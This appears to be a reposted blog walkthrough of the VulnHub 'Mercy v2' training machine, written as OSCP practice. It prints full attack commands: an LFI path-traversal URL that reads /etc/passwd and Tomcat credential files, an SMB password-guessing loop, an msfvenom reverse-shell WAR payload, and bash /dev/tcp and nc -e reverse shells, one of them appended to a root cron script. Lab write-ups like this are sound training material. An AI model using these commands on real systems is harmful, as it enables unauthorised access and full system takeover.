Digitalworld - Local Mercy Walkthrough SOG - Re
Uploaded by
gytuDigitalworld - Local Mercy Walkthrough SOG - Re
Uploaded by
gytu!
SOG.RE ! Home " Blog
Digitalworld.local Mercy Vulnhub Walkthrough
[Note: this post was originally posted on another blog I had in June 2020, and I worked through this VulnHub machine in an effort to
fix my enumeration and note-taking abilities after failing the OSCP exam the second time.]
Digitalworld.local Mercy V2 https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/
I liked this box and it reminds me of OSCP exam machines and good Hack The Box machines. There’s enumeration across multiple
services, uses different vulnerability exploitations, and has three different stages of initial access, user account, and root access. I
love the 3 stage access option because I’m used to it with Hack The Box, but OSCP machines don’t always have 3 stages.
Luckily much of the stuff that is important for me solving this box was in the Nmap output. There would be possible rabbit holes if I
missed that. It really makes me think that I missed stuff in the exam that prohibited me from having a full picture to help me solve
machines in my OSCP exam. I am glad I am working on purposefully ensuring my enumeration is good and I take good notes (even
the stuff that doesn’t work/work out).
This machine would have been more difficult if there were not any robot.txt files.
Flow
1. Enumerate ports
2. Port 8080 – /tryharder/tryharder
3. SMB qiu share works with qiu:password (clue from tryharder file)
4. Download qiu files from SMB share
5. Knock to open up port 22 and port 80 (knockd settings in SMB share file)
6. Find LFI in RIPS 0.53 on port 80
7. Read files on filesystem via LFI
A. Read /etc/passwd to get local usernames
B. Read tomcat configuration to get more logins (tomcat admin and local user)
8. Log in to Tomcat admin interface, upload a reverse shell war file, get a reverse shell
9. Pivot to fluffy user
10. Pop a root shell from a root cronjob, editing a file writable by fluffy
11. Get flag
Initial Enumeration
IP="10.88.42.132"
mkdir -p nmap
nmap -Pn -sC -sV -p 1-1000 -oA nmap/nmap_top1000_$IP $IP
nmap -Pn -sC -sV -p 1000-65535 -oA nmap/nmap_1000plus_$IP $IP
nmap -sC -sU -p 1-1000 -oA nmap/nmap_udp1000_$IP $IP
Top 1000 TCP Ports
# Nmap 7.80 scan initiated Sun Jun 14 12:48:55 2020 as: nmap -Pn -sC -sV -p 1-1000 -oA nmap/nmap_top1000_10.88.42.132
10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.0014s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.17-Ubuntu
80/tcp filtered http
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP UIDL RESP-CODES STLS AUTH-RESP-CODE SASL CAPA PIPELINING
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: post-login OK have LOGINDISABLEDA0001 LOGIN-REFERRALS STARTTLS SASL-IR listed Pre-login more cap
abilities IDLE IMAP4rev1 ID ENABLE LITERAL+
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imaps?
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:67:71:C0 (VMware)
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: -1s
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: mercy
| NetBIOS computer name: MERCY\x00
| Domain name: \x00
| FQDN: mercy
|_ System time: 2020-06-15T00:49:10+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-06-14T16:49:10
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 14 12:51:36 2020 -- 1 IP address (1 host up) scanned in 160.82 seconds
Remaining 1000+ TCP Ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-14 12:52 EDT
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.88.42.132
Host is up (0.00056s latency).
Not shown: 64535 closed ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:67:71:C0 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.92 seconds
UDP Top 1000 Ports
# Nmap 7.80 scan initiated Sun Jun 14 12:56:33 2020 as: nmap -sC -sU -p 1-1000 -oA nmap/nmap_udb1000_10.88.42.132 10.
88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.00079s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
53/udp open domain
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.17-Ubuntu
|_dns-recursion: Recursion appears to be enabled
68/udp open|filtered dhcpc
123/udp open ntp
| ntp-info:
|_
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
323/udp open|filtered unknown
631/udp open|filtered ipp
MAC Address: 00:0C:29:67:71:C0 (VMware)
Host script results:
|_clock-skew: 8s
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
# Nmap done at Sun Jun 14 13:16:06 2020 -- 1 IP address (1 host up) scanned in 1172.80 seconds
SMB Enumeration
[13:21:03] root[ /home/kali/VulnHub/mercy ]# smbclient -L 10.88.42.132
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
qiu Disk
IPC$ IPC IPC Service (MERCY server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[13:21:18] root[ /home/kali/VulnHub/mercy ]#
So, qui is interesting. Keep track of that as a possible user.
TCP 8080 – /tryharder/tryharder Step
Nmap noticed that robots.txt and the path exists.
robots.txt
http://10.88.42.132:8080/robots.txt
User-agent: *
Disallow: /tryharder/tryharder
/tryharder/tryharder
SXQncyBhbm5veWluZywgYnV0IHdlIHJlcGVhdCB0aGlzIG92ZXIgYW5kIG92ZXIgYWdhaW46IGN5YmVyIGh5Z2llbmUgaXMgZXh0cmVtZWx5IGltcG9yd
GFudC4gUGxlYXNlIHN0b3Agc2V0dGluZyBzaWxseSBwYXNzd29yZHMgdGhhdCB3aWxsIGdldCBjcmFja2VkIHdpdGggYW55IGRlY2VudCBwYXNzd29yZC
BsaXN0LgoKT25jZSwgd2UgZm91bmQgdGhlIHBhc3N3b3JkICJwYXNzd29yZCIsIHF1aXRlIGxpdGVyYWxseSBzdGlja2luZyBvbiBhIHBvc3QtaXQgaW4
gZnJvbnQgb2YgYW4gZW1wbG95ZWUncyBkZXNrISBBcyBzaWxseSBhcyBpdCBtYXkgYmUsIHRoZSBlbXBsb3llZSBwbGVhZGVkIGZvciBtZXJjeSB3aGVu
IHdlIHRocmVhdGVuZWQgdG8gZmlyZSBoZXIuCgpObyBmbHVmZnkgYnVubmllcyBmb3IgdGhvc2Ugd2hvIHNldCBpbnNlY3VyZSBwYXNzd29yZHMgYW5kI
GVuZGFuZ2VyIHRoZSBlbnRlcnByaXNlLg==
It is base64, once decoded it decoded into the text below.
It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting sill
y passwords that will get cracked with any decent password list.
Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As sill
y as it may be, the employee pleaded for mercy when we threatened to fire her.
No fluffy bunnies for those who set insecure passwords and endanger the enterprise.
Port 8080 – Normal
Attempting to access the manager/admin interface for Tomcat requires a login. So, we need a login (which should be no surprise).
It is Tomcat 7.
SMB Share – qiu
I am a dummy here again. I get that the “password” is clearly spelled out, but I was used to being tricked for some reason, so I
used the entire tryharder decoded file contents word by word to find it.
for pass in $(cat tryharder.txt); do echo ">> $pass <<" && smbclient \\\\10.88.42.132\\qiu -U qiu "$pass" 2>/dev/null
; done
Which stopped for the password of “password” works. I literally said to myself, “you’re a dummy.”
We can log in directly.
Now we should download all the files.
prompt
recurse
mget *
The only important files are config and configprint, with configprint appending configuration files to the config file. It includes
multiple configs but the one we care about is knockd configuration because port 80 and 22 are filtered (and likely firewalled off).
configprint
#!/bin/bash
echo "Here are settings for your perusal." > config
echo "" >> config
echo "Port Knocking Daemon Configuration" >> config
echo "" >> config
cat "/etc/knockd.conf" >> config
echo "" >> config
echo "Apache2 Configuration" >> config
echo "" >> config
cat "/etc/apache2/apache2.conf" >> config
echo "" >> config
echo "Samba Configuration" >> config
echo "" >> config
cat "/etc/samba/smb.conf" >> config
echo "" >> config
echo "For other details of MERCY, please contact your system administrator." >> config
chown qiu:qiu config
config (knockd parts of interest)
...
[openHTTP]
sequence = 159,27391,4
seq_timeout = 100
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
tcpflags = syn
...
[openSSH]
sequence = 17301,28504,9999
seq_timeout = 100
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
...
Knock Knock
for port in 17301 28504 9999; do nc 10.88.42.132 $port; done
for port in 159 27391 4; do nc 10.88.42.132 $port; done
Enumerate Port 22
# Nmap 7.80 scan initiated Sun Jun 14 14:04:48 2020 as: nmap -sC -sV -oA nmap/nmap_port22tcp_10.88.42.132 -p22 10.88.
42.132
Nmap scan report for 10.88.42.132
Host is up (0.00056s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 93:64:02:58:62:0e:e7:85:50:d9:97:ea:8d:01:68:f6 (DSA)
| 2048 13:77:33:9a:49:c0:51:dc:8f:fb:c8:33:17:b2:05:71 (RSA)
| 256 a2:25:3c:cf:ac:d7:0f:ae:2e:8c:c5:14:c4:65:c1:59 (ECDSA)
|_ 256 33:12:1b:6a:98:da:ea:9d:8c:09:94:ed:44:8d:4e:5b (ED25519)
MAC Address: 00:0C:29:67:71:C0 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 14 14:04:48 2020 -- 1 IP address (1 host up) scanned in 0.74 seconds
Nothing special there, other than knowing it is Ubuntu so at least we can discern file paths (for later).
I tried the qiu login and it didn’t work for SSH.
Port 80
Enumerate
# Nmap 7.80 scan initiated Sun Jun 14 14:02:07 2020 as: nmap -sC -sV -oA nmap/nmap_port80tcp_10.88.42.132 -p80 10.88.
42.132
Nmap scan report for 10.88.42.132
Host is up (0.00065s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/mercy /nomercy
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:67:71:C0 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 14 14:02:14 2020 -- 1 IP address (1 host up) scanned in 6.73 seconds
Nmap found the robots.txt file and showed the contents. Let’s look at it more.
robots.txt
User-agent: *
Disallow: /mercy
Disallow: /nomercy
Port 80 – /mercy
Welcome to Mercy!
We hope you do not plead for mercy too much. If you do, please help us upgrade our website to allow our visitors to o
btain more than just the local time of our system.
I made a mental note of that. It rang a bell later.
Port 80 – /nomercy
It is running RIPS 0.53. What is the first thing I should do when I find a web app with a version I never heard of… well I do
searchsploit.
There’s an LFI. The LFI also works.
http://10.88.42.132/nomercy/windows/code.php?file=../../../../../../etc/passwd
Or to simply grab it with the garbage removed.
wget -q -O- http://10.88.42.132/nomercy/windows/code.php?file=../../../../../../etc/passwd | awk -F'? ' '{print $2}'
...
pleadformercy:x:1000:1000:pleadformercy:/home/pleadformercy:/bin/bash
qiu:x:1001:1001:qiu:/home/qiu:/bin/bash
thisisasuperduperlonguser:x:1002:1002:,,,:/home/thisisasuperduperlonguser:/bin/bash
fluffy:x:1003:1003::/home/fluffy:/bin/sh
Getting The Tomcat Configuration Files
I wasn’t sure where Ubuntu stored Tomcat files so I looked it up. I found https://askubuntu.com/questions/135824/what-is-the-
tomcat-installation-directory and I am now looking for these files now.
/etc/tomcat7/server.xml
/etc/tomcat7/tomcat-users.xml
/etc/tomcat7/web.xml
/etc/tomcat7/catalina.properties
So I grabbed them all and saved them locally, and also had to convert the HTML entities back to ASCII.
for file in server.xml tomcat-users.xml web.xml catalina.properties; do wget -q -O- http://10.88.42.132/nomercy/windo
ws/code.php?file=../../../../../../etc/tomcat7/$file | awk -F'? ' '{print $2}' | sed -e 's/"/"/g' -e 's/>/>/g
' -e 's/</</g' > $file ; done
With some logins found and the admin/manager was in it.
thisisasuperduperlonguser:heartbreakisinevitable
fluffy:freakishfluffybunny
Now that we have to Tomcat admin login, time to try to log in with it.
Port 8080 – Tomcat Revisited
thisisasuperduperlonguser:heartbreakisinevitable (Tomcat admin/manager)
fluffy:freakishfluffybunny (Tomcat normal, no access)
Logging in works for thisisasuperduperlonguser:heartbreakisinevitable.
Now time to get our reverse shell. The common thing to do is to use msfvenom to build a .war file, upload the war in the
admin/manager interface, and then browse to the uploaded application which pops a reverse shell.
Generate the reverse shell .war file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.88.42.133 LPORT=4444 -f war > sogwtf.war
Start a netcat listener
nc -lvnp 4444
Upload the war file
Spawn reverse shell
Gain Access To The Machine And Pivot To fluffy
The only other creds I have is for fluffy, so su to that user, and take a look around.
timeclock Script
#!/bin/bash
now=$(date)
echo "The system time is: $now." > ../../../../../var/www/html/time
echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time
chown www-data:www-data ../../../../../var/www/html/time
An interesting script. It ties together with the port 80 /mercy clue. I didn’t look further and honed in on this. I checked the timestamp
on the time file and checked if fluffy’s crontab was doing it. The file was recently updated and fluffy didn’t have a crontab. So, I
assumed it was root or pleadformercy (with elevated perms to do the chown).
So, I worked to get another reverse shell!
Tested to see if I could get a reverse shell as with nc.
fluffy@MERCY:~/.private/secrets$ nc -e /bin/bash 10.88.42.133 9000
nc -e /bin/bash 10.88.42.133 9000
nc: invalid option -- 'e'
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
[-P proxy_username] [-p source_port] [-q seconds] [-s source]
[-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [destination] [port]
fluffy@MERCY:~/.private/secrets$
Pulled up the trusty pentestmoney reverse shell cheat sheet at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-
sheet to get the bash syntax or the other nc one with pipes. The bash one worked!
bash -i >& /dev/tcp/10.88.42.133/9000 0>&1
Getting The root Shell
echo 'bash -i >& /dev/tcp/10.88.42.133/9000 0>&1' >> timeclock
And root shell popped!
Get The Flags
Published on October 11, 2020 and last updated on November 16, 2020.
Leave a Reply
Your email address will not be published. Required fields are marked *
Comment *
Name *
Email *
Website
Save my name, email, and website in this browser for the next time I comment.
Post Comment
© 2020 Sogon Security, LLC. All Rights Reserved. Any unauthorized use is expressly prohibited.